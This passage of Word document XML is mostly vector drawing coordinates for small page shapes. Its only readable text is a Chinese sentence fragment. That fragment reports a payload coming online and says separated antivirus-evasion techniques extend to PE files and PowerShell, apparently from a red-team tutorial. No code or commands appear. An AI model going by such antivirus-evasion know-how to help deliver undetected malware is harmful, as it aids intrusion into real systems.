87,2019,15287,2020,15287,2022,15287,2024,15287,2025,15287,2027,15287,2029,15287,2030,15287,2032,15287,2034,15287,2036,15287,2038,15287,2040,15287,2042,15287,2044,15287,2046,15287,2048,15287,2051,15287,2053,15287,2055,15287,2057,15287,2060,15287,2062,15287,2065,15287,2067,15287,2070,15287,2072,15287,2075,15287,2078,15287,2081,15287,2083,15287,2086,15287,2089,15287,2092,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15288,2095,15288,2095,15288,2095,15288,2095,15288,2095,15289,2095,15289,2095,15289,2095,15289,2095,15290,2095,15290,2095,15290,2095,15291,2095,15291,2095,15292,2095,15292,2095,15293,2095,15293,2095,15294,2095,15294,2095,15295,2095,15296,2095,15296,2095,15297,2095,15298,2095,15299,2095,15300,2095,15300,2095,15301,2095,15302,2095,15303,2095,15305,2095,15306,2095,15307,2095,15308,2095,15309,2095,15311,2095,15312,2095,15313,2095,15315,2095,15316,2095,15318,2095,15319,2095,15321,2095,15323,2095,15325,2095,15326,2095,15328,2095,15330,2095,15332,2095,15334,2095,15336,2095,15339,2095,15341,2095,15343,2095,15346,2095,15348,2095,15351,2095,15353,2095,15356,2095,15359,2095,15361,2095,15364,2095,15367,2095,15370,2095,15373,2095,15376,2095,15380,2095,15383,2095,15386,2095,15390,2095,15393,2095,15397,2095,15401,2095,15405,2095,15408,2095,15412,2095,15417,2095,15421,2095,15425,2095,15429,2095,15434,2095,15438,2095,15443,2095,15447,2095,15452,2095,15457,2095,15462,2095,15467,2095,15472,2095,15477,2095,15483,2095,15488,2095,15494,2095,15499,2095,15505,2095,15511,2095,15517,2095,15523,2095,15529,2095,15535,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2094,15542,2094,15542,2094,15542,2094,15542,2094,15542,2094,15542,2094,15542,2094,15542,2093,15542,2093,15542,2093,15542,2093,15542,2093,15542,2092,15542,2092,15542,2092,15542,2092,15542,2091,15542,2091,15542,2091,15542,2090,15542,2090,15542,2090,15542,2089,15542,2089,15542,2089,15542,2088,15542,2088,15542,2087,15542,2087,15542,2086,15542,2086,15542,2085,15542,2084,15542,2084,15542,2083,15542,2083,15542,2082,15542,2081,15542,2080,15542,2080,15542,2079,15542,2078,15542,2077,15542,2076,15542,2075,15542,2075,15542,2074,15542,2073,15542,2072,15542,2071,15542,2070,15542,2068,15542,2067,15542,2066,15542,2065,15542,2064,15542,2063,15542,2061,15542,2060,15542,2059,15542,2057,15542,2056,15542,2054,15542,2053,15542,2051,15542,2050,15542,2048,15542,2047,15542,2045,15542,2043,15542,2041,15542,2040,15542,2038,15542,2036,15542,2034,15542,2032,15542,2030,15542,2028,15542,2026,15542,2024,15542,2022,15542,2019,15542,2017,15542,2015,15542,2013,15542,2010,15542,2008,15542,2005,15542,2003,15542,2000,15542,1998,15542,1995,15542,1992,15542,1990,15542,1987,15542,1984,15542,1981,15542,1978,15542,1975,15542,1975,15542,1975,15542,1975,15542,1975,15542,1975,15542,1975,15542,1975,15542,1975,15542,1975,15542,1975,15542,1975,15542,1975,15542,1975,15542,1975,15541,1975,15541,1975,15541,1975,15541,1975,15541,1975,15541,1975,15541,1975,15541,1975,15540,1975,15540,1975,15540,1975,15540,1975,15539,1975,15539,1975,15539,1975,15539,1975,15538,1975,15538,1975,15537,1975,15537,1975,15536,1975,15536,1975,15535,1975,15535,1975,15534,1975,15534,1975,15533,1975,15532,1975,15531,1975,15531,1975,15530,1975,15529,1975,15528,1975,15527,1975,15526,1975,15525,1975,15524,1975,15523,1975,15522,1975,15521,1975,15519,1975,15518,1975,15517,1975,15515,1975,15514,1975,15512,1975,15511,1975,15509,1975,15507,1975,15506,1975,15504,1975,15502,1975,15500,1975,15498,1975,15496,1975,15494,1975,15492,1975,15490,1975,15488,1975,15485,1975,15483,1975,15480,1975,15478,1975,15475,1975,15473,1975,15470,1975,15467,1975,15464,1975,15461,1975,15458,1975,15455,1975,15452,1975,15449,1975,15446,1975,15442,1975,15439,1975,15435,1975,15431,1975,15428,1975,15424,1975,15420,1975,15416,1975,15412,1975,15408,1975,15404,1975,15399,1975,15395,1975,15390,1975,15386,1975,15381,1975,15376,1975,15372,1975,15367,1975,15362,1975,15356,1975,15351,1975,15346,1975,15340,1975,15335,1975,15329,1975,15323,1975,15318,1975,15312,1975,15306,1975,15299,1975,15293,1975,15287e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:103.500pt;margin-top:763.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2070,15270" coordsize="130,270">
        <v:shape style="position:absolute;left:2070;top:15270;width:130;height:270" coordorigin="2070,15270" coordsize="130,270" path="m2095,15287l2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2096,15287,2096,15287,2096,15287,2096,15287,2096,15287,2096,15287,2096,15287,2096,15287,2096,15287,2097,15287,2097,15287,2097,15287,2097,15287,2097,15287,2098,15287,2098,15287,2098,15287,2098,15287,2099,15287,2099,15287,2099,15287,2100,15287,2100,15287,2100,15287,2101,15287,2101,15287,2102,15287,2102,15287,2102,15287,2103,15287,2103,15287,2104,15287,2105,15287,2105,15287,2106,15287,2106,15287,2107,15287,2108,15287,2108,15287,2109,15287,2110,15287,2110,15287,2111,15287,2112,15287,2113,15287,2114,15287,2115,15287,2116,15287,2116,15287,2117,15287,2118,15287,2119,15287,2121,15287,2122,15287,2123,15287,2124,15287,2125,15287,2126,15287,2128,15287,2129,15287,2130,15287,2132,15287,2133,15287,2134,15287,2136,15287,2137,15287,2139,15287,2140,15287,2142,15287,2144,15287,2145,15287,2147,15287,2149,15287,2151,15287,2152,15287,2154,15287,2156,15287,2158,15287,2160,15287,2162,15287,2164,15287,2166,15287,2168,15287,2171,15287,2173,15287,2175,15287,2178,15287,2180,15287,2182,15287,2185,15287,2187,15287,2190,15287,2192,15287,2195,15287,2198,15287,2201,15287,2203,15287,2206,15287,2209,15287,2212,15287,2215,15287,2215,15287,2215,15287,2215,15287,2215,15287,2215,15287,2215,15287,2215,15287,2215,15287,2215,15287,2215,15287,2215,15287,2215,15287,2215,15287,2215,15287,2215,15287,2215,15287,2215,15287,2215,15287,2215,15288,2215,15288,2215,15288,2215,15288,2215,15288,2215,15289,2215,15289,2215,15289,2215,15289,2215,15290,2215,15290,2215,15290,2215,15291,2215,15291,2215,15292,2215,15292,2215,15293,2215,15293,2215,15294,2215,15294,2215,15295,2215,15296,2215,15296,2215,15297,2215,15298,2215,15299,2215,15300,2215,15300,2215,15301,2215,15302,2215,15303,2215,15305,2215,15306,2215,15307,2215,15308,2215,15309,2215,15311,2215,15312,2215,15313,2215,15315,2215,15316,2215,15318,2215,15319,2215,15321,2215,15323,2215,15325,2215,15326,2215,15328,2215,15330,2215,15332,2215,15334,2215,15336,2215,15339,2215,15341,2215,15343,2215,15346,2215,15348,2215,15351,2215,15353,2215,15356,2215,15359,2215,15361,2215,15364,2215,15367,2215,15370,2215,15373,2215,15376,2215,15380,2215,15383,2215,15386,2215,15390,2215,15393,2215,15397,2215,15401,2215,15405,2215,15408,2215,15412,2215,15417,2215,15421,2215,15425,2215,15429,2215,15434,2215,15438,2215,15443,2215,15447,2215,15452,2215,15457,2215,15462,2215,15467,2215,15472,2215,15477,2215,15483,2215,15488,2215,15494,2215,15499,2215,15505,2215,15511,2215,15517,2215,15523,2215,15529,2215,15535,2215,15542,2215,15542,2215,15542,2215,15542,2215,15542,2215,15542,2215,15542,2215,15542,2215,15542,2215,15542,2215,15542,2215,15542,2215,15542,2215,15542,2215,15542,2215,15542,2215,15542,2215,15542,2215,15542,2215,15542,2215,15542,2215,15542,2214,15542,2214,15542,2214,15542,2214,15542,2214,15542,2214,15542,2214,15542,2214,15542,2213,15542,2213,15542,2213,15542,2213,15542,2213,15542,2212,15542,2212,15542,2212,15542,2212,15542,2211,15542,2211,15542,2211,15542,2210,15542,2210,15542,2209,15542,2209,15542,2209,15542,2208,15542,2208,15542,2207,15542,2207,15542,2206,15542,2206,15542,2205,15542,2205,15542,2204,15542,2203,15542,2203,15542,2202,15542,2201,15542,2200,15542,2200,15542,2199,15542,2198,15542,2197,15542,2196,15542,2196,15542,2195,15542,2194,15542,2193,15542,2192,15542,2191,15542,2190,15542,2189,15542,2187,15542,2186,15542,2185,15542,2184,15542,2183,15542,2181,15542,2180,15542,2179,15542,2177,15542,2176,15542,2174,15542,2173,15542,2171,15542,2170,15542,2168,15542,2167,15542,2165,15542,2163,15542,2161,15542,2160,15542,2158,15542,2156,15542,2154,15542,2152,15542,2150,15542,2148,15542,2146,15542,2144,15542,2142,15542,2140,15542,2137,15542,2135,15542,2133,15542,2130,15542,2128,15542,2125,15542,2123,15542,2120,15542,2118,15542,2115,15542,2112,15542,2110,15542,2107,15542,2104,15542,2101,15542,2098,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15541,2095,15541,2095,15541,2095,15541,2095,15541,2095,15541,2095,15541,2095,15541,2095,15540,2095,15540,2095,15540,2095,15540,2095,15539,2095,15539,2095,15539,2095,15539,2095,15538,2095,15538,2095,15537,2095,15537,2095,15536,2095,15536,2095,15535,2095,15535,2095,15534,2095,15534,2095,15533,2095,15532,2095,15531,2095,15531,2095,15530,2095,15529,2095,15528,2095,15527,2095,15526,2095,15525,2095,15524,2095,15523,2095,15522,2095,15521,2095,15519,2095,15518,2095,15517,2095,15515,2095,15514,2095,15512,2095,15511,2095,15509,2095,15507,2095,15506,2095,15504,2095,15502,2095,15500,2095,15498,2095,15496,2095,15494,2095,15492,2095,15490,2095,15488,2095,15485,2095,15483,2095,15480,2095,15478,2095,15475,2095,15473,2095,15470,2095,15467,2095,15464,2095,15461,2095,15458,2095,15455,2095,15452,2095,15449,2095,15446,2095,15442,2095,15439,2095,15435,2095,15431,2095,15428,2095,15424,2095,15420,2095,15416,2095,15412,2095,15408,2095,15404,2095,15399,2095,15395,2095,15390,2095,15386,2095,15381,2095,15376,2095,15372,2095,15367,2095,15362,2095,15356,2095,15351,2095,15346,2095,15340,2095,15335,2095,15329,2095,15323,2095,15318,2095,15312,2095,15306,2095,15299,2095,15293,2095,15287e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:217.500pt;margin-top:763.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4350,15270" coordsize="130,270">
        <v:shape style="position:absolute;left:4350;top:15270;width:130;height:270" coordorigin="4350,15270" coordsize="130,270" path="m4376,15287l4376,15287,4376,15287,4376,15287,4376,15287,4376,15287,4376,15287,4376,15287,4376,15287,4376,15287,4376,15287,4376,15287,4376,15287,4376,15287,4376,15287,4376,15287,4376,15287,4376,15287,4377,15287,4377,15287,4377,15287,4377,15287,4377,15287,4377,15287,4377,15287,4377,15287,4377,15287,4377,15287,4378,15287,4378,15287,4378,15287,4378,15287,4378,15287,4379,15287,4379,15287,4379,15287,4379,15287,4380,15287,4380,15287,4380,15287,4380,15287,4381,15287,4381,15287,4381,15287,4382,15287,4382,15287,4383,15287,4383,15287,4384,15287,4384,15287,4385,15287,4385,15287,4386,15287,4386,15287,4387,15287,4387,15287,4388,15287,4389,15287,4389,15287,4390,15287,4391,15287,4392,15287,4392,15287,4393,15287,4394,15287,4395,15287,4396,15287,4397,15287,4398,15287,4399,15287,4400,15287,4401,15287,4402,15287,4403,15287,4404,15287,4405,15287,4406,15287,4407,15287,4409,15287,4410,15287,4411,15287,4413,15287,4414,15287,4415,15287,4417,15287,4418,15287,4420,15287,4422,15287,4423,15287,4425,15287,4426,15287,4428,15287,4430,15287,4432,15287,4434,15287,4435,15287,4437,15287,4439,15287,4441,15287,4443,15287,4445,15287,4447,15287,4450,15287,4452,15287,4454,15287,4456,15287,4459,15287,4461,15287,4463,15287,4466,15287,4468,15287,4471,15287,4474,15287,4476,15287,4479,15287,4482,15287,4485,15287,4487,15287,4490,15287,4493,15287,4496,15287,4496,15287,4496,15287,4496,15287,4496,15287,4496,15287,4496,15287,4496,15287,4496,15287,4496,15287,4496,15287,4496,15287,4496,15287,4496,15287,4496,15287,4496,15287,4496,15287,4496,15287,4496,15287,4496,15288,4496,15288,4496,15288,4496,15288,4496,15288,4496,15289,4496,15289,4496,15289,4496,15289,4496,15290,4496,15290,4496,15290,4496,15291,4496,15291,4496,15292,4496,15292,4496,15293,4496,15293,4496,15294,4496,15294,4496,15295,4496,15296,4496,15296,4496,15297,4496,15298,4496,15299,4496,15300,4496,15300,4496,15301,4496,15302,4496,15303,4496,15305,4496,15306,4496,15307,4496,15308,4496,15309,4496,15311,4496,15312,4496,15313,4496,15315,4496,15316,4496,15318,4496,15319,4496,15321,4496,15323,4496,15325,4496,15326,4496,15328,4496,15330,4496,15332,4496,15334,4496,15336,4496,15339,4496,15341,4496,15343,4496,15346,4496,15348,4496,15351,4496,15353,4496,15356,4496,15359,4496,15361,4496,15364,4496,15367,4496,15370,4496,15373,4496,15376,4496,15380,4496,15383,4496,15386,4496,15390,4496,15393,4496,15397,4496,15401,4496,15405,4496,15408,4496,15412,4496,15417,4496,15421,4496,15425,4496,15429,4496,15434,4496,15438,4496,15443,4496,15447,4496,15452,4496,15457,4496,15462,4496,15467,4496,15472,4496,15477,4496,15483,4496,15488,4496,15494,4496,15499,4496,15505,4496,15511,4496,15517,4496,15523,4496,15529,4496,15535,4496,15542,4496,15542,4496,15542,4496,15542,4496,15542,4496,15542,4496,15542,4496,15542,4496,15542,4496,15542,4496,15542,4496,15542,4496,15542,4496,15542,4496,15542,4496,15542,4496,15542,4496,15542,4496,15542,4496,15542,4496,15542,4496,15542,4496,15542,4496,15542,4495,15542,4495,15542,4495,15542,4495,15542,4495,15542,4495,15542,4495,15542,4494,15542,4494,15542,4494,15542,4494,15542,4493,15542,4493,15542,4493,15542,4493,15542,4492,15542,4492,15542,4492,15542,4491,15542,4491,15542,4491,15542,4490,15542,4490,15542,4489,15542,4489,15542,4488,15542,4488,15542,4487,15542,4487,15542,4486,15542,4486,15542,4485,15542,4484,15542,4484,15542,4483,15542,4482,15542,4482,15542,4481,15542,4480,15542,4479,15542,4478,15542,4478,15542,4477,15542,4476,15542,4475,15542,4474,15542,4473,15542,4472,15542,4471,15542,4470,15542,4469,15542,4467,15542,4466,15542,4465,15542,4464,15542,4462,15542,4461,15542,4460,15542,4458,15542,4457,15542,4456,15542,4454,15542,4453,15542,4451,15542,4449,15542,4448,15542,4446,15542,4444,15542,4443,15542,4441,15542,4439,15542,4437,15542,4435,15542,4433,15542,4431,15542,4429,15542,4427,15542,4425,15542,4423,15542,4421,15542,4418,15542,4416,15542,4414,15542,4411,15542,4409,15542,4407,15542,4404,15542,4401,15542,4399,15542,4396,15542,4393,15542,4391,15542,4388,15542,4385,15542,4382,15542,4379,15542,4376,15542,4376,15542,4376,15542,4376,15542,4376,15542,4376,15542,4376,15542,4376,15542,4376,15542,4376,15542,4376,15542,4376,15542,4376,15542,4376,15542,4376,15541,4376,15541,4376,15541,4376,15541,4376,15541,4376,15541,4376,15541,4376,15541,4376,15540,4376,15540,4376,15540,4376,15540,4376,15539,4376,15539,4376,15539,4376,15539,4376,15538,4376,15538,4376,15537,4376,15537,4376,15536,4376,15536,4376,15535,4376,15535,4376,15534,4376,15534,4376,15533,4376,15532,4376,15531,4376,15531,4376,15530,4376,15529,4376,15528,4376,15527,4376,15526,4376,15525,4376,15524,4376,15523,4376,15522,4376,15521,4376,15519,4376,15518,4376,15517,4376,15515,4376,15514,4376,15512,4376,15511,4376,15509,4376,15507,4376,15506,4376,15504,4376,15502,4376,15500,4376,15498,4376,15496,4376,15494,4376,15492,4376,15490,4376,15488,4376,15485,4376,15483,4376,15480,4376,15478,4376,15475,4376,15473,4376,15470,4376,15467,4376,15464,4376,15461,4376,15458,4376,15455,4376,15452,4376,15449,4376,15446,4376,15442,4376,15439,4376,15435,4376,15431,4376,15428,4376,15424,4376,15420,4376,15416,4376,15412,4376,15408,4376,15404,4376,15399,4376,15395,4376,15390,4376,15386,4376,15381,4376,15376,4376,15372,4376,15367,4376,15362,4376,15356,4376,15351,4376,15346,4376,15340,4376,15335,4376,15329,4376,15323,4376,15318,4376,15312,4376,15306,4376,15299,4376,15293,4376,15287e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:421.500pt;margin-top:763.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="8430,15270" coordsize="130,270">
        <v:shape style="position:absolute;left:8430;top:15270;width:130;height:270" coordorigin="8430,15270" coordsize="130,270" path="m8458,15287l8458,15287,8458,15287,8458,15287,8458,15287,8458,15287,8458,15287,8458,15287,8458,15287,8458,15287,8458,15287,8458,15287,8458,15287,8458,15287,8458,15287,8458,15287,8459,15287,8459,15287,8459,15287,8459,15287,8459,15287,8459,15287,8459,15287,8459,15287,8459,15287,8459,15287,8459,15287,8460,15287,8460,15287,8460,15287,8460,15287,8460,15287,8460,15287,8461,15287,8461,15287,8461,15287,8461,15287,8462,15287,8462,15287,8462,15287,8462,15287,8463,15287,8463,15287,8464,15287,8464,15287,8464,15287,8465,15287,8465,15287,8466,15287,8466,15287,8467,15287,8467,15287,8468,15287,8468,15287,8469,15287,8469,15287,8470,15287,8471,15287,8471,15287,8472,15287,8473,15287,8474,15287,8474,15287,8475,15287,8476,15287,8477,15287,8478,15287,8479,15287,8480,15287,8481,15287,8482,15287,8483,15287,8484,15287,8485,15287,8486,15287,8487,15287,8488,15287,8490,15287,8491,15287,8492,15287,8493,15287,8495,15287,8496,15287,8498,15287,8499,15287,8500,15287,8502,15287,8504,15287,8505,15287,8507,15287,8508,15287,8510,15287,8512,15287,8514,15287,8516,15287,8517,15287,8519,15287,8521,15287,8523,15287,8525,15287,8527,15287,8530,15287,8532,15287,8534,15287,8536,15287,8538,15287,8541,15287,8543,15287,8546,15287,8548,15287,8551,15287,8553,15287,8556,15287,8558,15287,8561,15287,8564,15287,8567,15287,8569,15287,8572,15287,8575,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15288,8578,15288,8578,15288,8578,15288,8578,15288,8578,15289,8578,15289,8578,15289,8578,15289,8578,15290,8578,15290,8578,15290,8578,15291,8578,15291,8578,15292,8578,15292,8578,15293,8578,15293,8578,15294,8578,15294,8578,15295,8578,15296,8578,15296,8578,15297,8578,15298,8578,15299,8578,15300,8578,15300,8578,15301,8578,15302,8578,15303,8578,15305,8578,15306,8578,15307,8578,15308,8578,15309,8578,15311,8578,15312,8578,15313,8578,15315,8578,15316,8578,15318,8578,15319,8578,15321,8578,15323,8578,15325,8578,15326,8578,15328,8578,15330,8578,15332,8578,15334,8578,15336,8578,15339,8578,15341,8578,15343,8578,15346,8578,15348,8578,15351,8578,15353,8578,15356,8578,15359,8578,15361,8578,15364,8578,15367,8578,15370,8578,15373,8578,15376,8578,15380,8578,15383,8578,15386,8578,15390,8578,15393,8578,15397,8578,15401,8578,15405,8578,15408,8578,15412,8578,15417,8578,15421,8578,15425,8578,15429,8578,15434,8578,15438,8578,15443,8578,15447,8578,15452,8578,15457,8578,15462,8578,15467,8578,15472,8578,15477,8578,15483,8578,15488,8578,15494,8578,15499,8578,15505,8578,15511,8578,15517,8578,15523,8578,15529,8578,15535,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8577,15542,8577,15542,8577,15542,8577,15542,8577,15542,8577,15542,8577,15542,8576,15542,8576,15542,8576,15542,8576,15542,8576,15542,8575,15542,8575,15542,8575,15542,8574,15542,8574,15542,8574,15542,8573,15542,8573,15542,8573,15542,8572,15542,8572,15542,8571,15542,8571,15542,8570,15542,8570,15542,8569,15542,8569,15542,8568,15542,8568,15542,8567,15542,8566,15542,8566,15542,8565,15542,8564,15542,8564,15542,8563,15542,8562,15542,8561,15542,8561,15542,8560,15542,8559,15542,8558,15542,8557,15542,8556,15542,8555,15542,8554,15542,8553,15542,8552,15542,8551,15542,8549,15542,8548,15542,8547,15542,8546,15542,8545,15542,8543,15542,8542,15542,8540,15542,8539,15542,8538,15542,8536,15542,8535,15542,8533,15542,8531,15542,8530,15542,8528,15542,8526,15542,8525,15542,8523,15542,8521,15542,8519,15542,8517,15542,8515,15542,8513,15542,8511,15542,8509,15542,8507,15542,8505,15542,8503,15542,8500,15542,8498,15542,8496,15542,8493,15542,8491,15542,8489,15542,8486,15542,8483,15542,8481,15542,8478,15542,8476,15542,8473,15542,8470,15542,8467,15542,8464,15542,8461,15542,8458,15542,8458,15542,8458,15542,8458,15542,8458,15542,8458,15542,8458,15542,8458,15542,8458,15542,8458,15542,8458,15542,8458,15542,8458,15542,8458,15542,8458,15541,8458,15541,8458,15541,8458,15541,8458,15541,8458,15541,8458,15541,8458,15541,8458,15540,8458,15540,8458,15540,8458,15540,8458,15539,8458,15539,8458,15539,8458,15539,8458,15538,8458,15538,8458,15537,8458,15537,8458,15536,8458,15536,8458,15535,8458,15535,8458,15534,8458,15534,8458,15533,8458,15532,8458,15531,8458,15531,8458,15530,8458,15529,8458,15528,8458,15527,8458,15526,8458,15525,8458,15524,8458,15523,8458,15522,8458,15521,8458,15519,8458,15518,8458,15517,8458,15515,8458,15514,8458,15512,8458,15511,8458,15509,8458,15507,8458,15506,8458,15504,8458,15502,8458,15500,8458,15498,8458,15496,8458,15494,8458,15492,8458,15490,8458,15488,8458,15485,8458,15483,8458,15480,8458,15478,8458,15475,8458,15473,8458,15470,8458,15467,8458,15464,8458,15461,8458,15458,8458,15455,8458,15452,8458,15449,8458,15446,8458,15442,8458,15439,8458,15435,8458,15431,8458,15428,8458,15424,8458,15420,8458,15416,8458,15412,8458,15408,8458,15404,8458,15399,8458,15395,8458,15390,8458,15386,8458,15381,8458,15376,8458,15372,8458,15367,8458,15362,8458,15356,8458,15351,8458,15346,8458,15340,8458,15335,8458,15329,8458,15323,8458,15318,8458,15312,8458,15306,8458,15299,8458,15293,8458,15287e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:427.500pt;margin-top:763.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="8550,15270" coordsize="130,270">
        <v:shape style="position:absolute;left:8550;top:15270;width:130;height:270" coordorigin="8550,15270" coordsize="130,270" path="m8578,15287l8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8579,15287,8579,15287,8579,15287,8579,15287,8579,15287,8579,15287,8579,15287,8579,15287,8579,15287,8579,15287,8579,15287,8579,15287,8580,15287,8580,15287,8580,15287,8580,15287,8580,15287,8580,15287,8581,15287,8581,15287,8581,15287,8581,15287,8582,15287,8582,15287,8582,15287,8583,15287,8583,15287,8583,15287,8584,15287,8584,15287,8584,15287,8585,15287,8585,15287,8586,15287,8586,15287,8587,15287,8587,15287,8588,15287,8588,15287,8589,15287,8590,15287,8590,15287,8591,15287,8592,15287,8592,15287,8593,15287,8594,15287,8594,15287,8595,15287,8596,15287,8597,15287,8598,15287,8599,15287,8600,15287,8601,15287,8602,15287,8603,15287,8604,15287,8605,15287,8606,15287,8607,15287,8608,15287,8610,15287,8611,15287,8612,15287,8613,15287,8615,15287,8616,15287,8618,15287,8619,15287,8621,15287,8622,15287,8624,15287,8625,15287,8627,15287,8629,15287,8630,15287,8632,15287,8634,15287,8636,15287,8637,15287,8639,15287,8641,15287,8643,15287,8645,15287,8647,15287,8650,15287,8652,15287,8654,15287,8656,15287,8658,15287,8661,15287,8663,15287,8666,15287,8668,15287,8671,15287,8673,15287,8676,15287,8678,15287,8681,15287,8684,15287,8687,15287,8690,15287,8692,15287,8695,15287,8698,15287,8698,15287,8698,15287,8698,15287,8698,15287,8698,15287,8698,15287,8698,15287,8698,15287,8698,15287,8698,15287,8698,15287,8698,15287,8698,15287,8698,15287,8698,15287,8698,15287,8698,15287,8698,15287,8698,15288,8698,15288,8698,15288,8698,15288,8698,15288,8698,15289,8698,15289,8698,15289,8698,15289,8698,15290,8698,15290,8698,15290,8698,15291,8698,15291,8698,15292,8698,15292,8698,15293,8698,15293,8698,15294,8698,15294,8698,15295,8698,15296,8698,15296,8698,15297,8698,15298,8698,15299,8698,15300,8698,15300,8698,15301,8698,15302,8698,15303,8698,15305,8698,15306,8698,15307,8698,15308,8698,15309,8698,15311,8698,15312,8698,15313,8698,15315,8698,15316,8698,15318,8698,15319,8698,15321,8698,15323,8698,15325,8698,15326,8698,15328,8698,15330,8698,15332,8698,15334,8698,15336,8698,15339,8698,15341,8698,15343,8698,15346,8698,15348,8698,15351,8698,15353,8698,15356,8698,15359,8698,15361,8698,15364,8698,15367,8698,15370,8698,15373,8698,15376,8698,15380,8698,15383,8698,15386,8698,15390,8698,15393,8698,15397,8698,15401,8698,15405,8698,15408,8698,15412,8698,15417,8698,15421,8698,15425,8698,15429,8698,15434,8698,15438,8698,15443,8698,15447,8698,15452,8698,15457,8698,15462,8698,15467,8698,15472,8698,15477,8698,15483,8698,15488,8698,15494,8698,15499,8698,15505,8698,15511,8698,15517,8698,15523,8698,15529,8698,15535,8698,15542,8698,15542,8698,15542,8698,15542,8698,15542,8698,15542,8698,15542,8698,15542,8698,15542,8698,15542,8698,15542,8698,15542,8698,15542,8698,15542,8698,15542,8698,15542,8698,15542,8698,15542,8698,15542,8698,15542,8698,15542,8698,15542,8698,15542,8698,15542,8698,15542,8697,15542,8697,15542,8697,15542,8697,15542,8697,15542,8697,15542,8696,15542,8696,15542,8696,15542,8696,15542,8696,15542,8695,15542,8695,15542,8695,15542,8694,15542,8694,15542,8694,15542,8693,15542,8693,15542,8693,15542,8692,15542,8692,15542,8691,15542,8691,15542,8691,15542,8690,15542,8689,15542,8689,15542,8688,15542,8688,15542,8687,15542,8687,15542,8686,15542,8685,15542,8684,15542,8684,15542,8683,15542,8682,15542,8681,15542,8681,15542,8680,15542,8679,15542,8678,15542,8677,15542,8676,15542,8675,15542,8674,15542,8673,15542,8672,15542,8671,15542,8670,15542,8668,15542,8667,15542,8666,15542,8665,15542,8663,15542,8662,15542,8661,15542,8659,15542,8658,15542,8656,15542,8655,15542,8653,15542,8651,15542,8650,15542,8648,15542,8646,15542,8645,15542,8643,15542,8641,15542,8639,15542,8637,15542,8635,15542,8633,15542,8631,15542,8629,15542,8627,15542,8625,15542,8623,15542,8621,15542,8618,15542,8616,15542,8614,15542,8611,15542,8609,15542,8606,15542,8604,15542,8601,15542,8598,15542,8596,15542,8593,15542,8590,15542,8587,15542,8584,15542,8581,15542,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8578,15541,8578,15541,8578,15541,8578,15541,8578,15541,8578,15541,8578,15541,8578,15541,8578,15540,8578,15540,8578,15540,8578,15540,8578,15539,8578,15539,8578,15539,8578,15539,8578,15538,8578,15538,8578,15537,8578,15537,8578,15536,8578,15536,8578,15535,8578,15535,8578,15534,8578,15534,8578,15533,8578,15532,8578,15531,8578,15531,8578,15530,8578,15529,8578,15528,8578,15527,8578,15526,8578,15525,8578,15524,8578,15523,8578,15522,8578,15521,8578,15519,8578,15518,8578,15517,8578,15515,8578,15514,8578,15512,8578,15511,8578,15509,8578,15507,8578,15506,8578,15504,8578,15502,8578,15500,8578,15498,8578,15496,8578,15494,8578,15492,8578,15490,8578,15488,8578,15485,8578,15483,8578,15480,8578,15478,8578,15475,8578,15473,8578,15470,8578,15467,8578,15464,8578,15461,8578,15458,8578,15455,8578,15452,8578,15449,8578,15446,8578,15442,8578,15439,8578,15435,8578,15431,8578,15428,8578,15424,8578,15420,8578,15416,8578,15412,8578,15408,8578,15404,8578,15399,8578,15395,8578,15390,8578,15386,8578,15381,8578,15376,8578,15372,8578,15367,8578,15362,8578,15356,8578,15351,8578,15346,8578,15340,8578,15335,8578,15329,8578,15323,8578,15318,8578,15312,8578,15306,8578,15299,8578,15293,8578,1528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上线成功，关于分离免杀的思路不仅仅限制于脚本，pe文件。包括powersh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ell等。这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是每</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
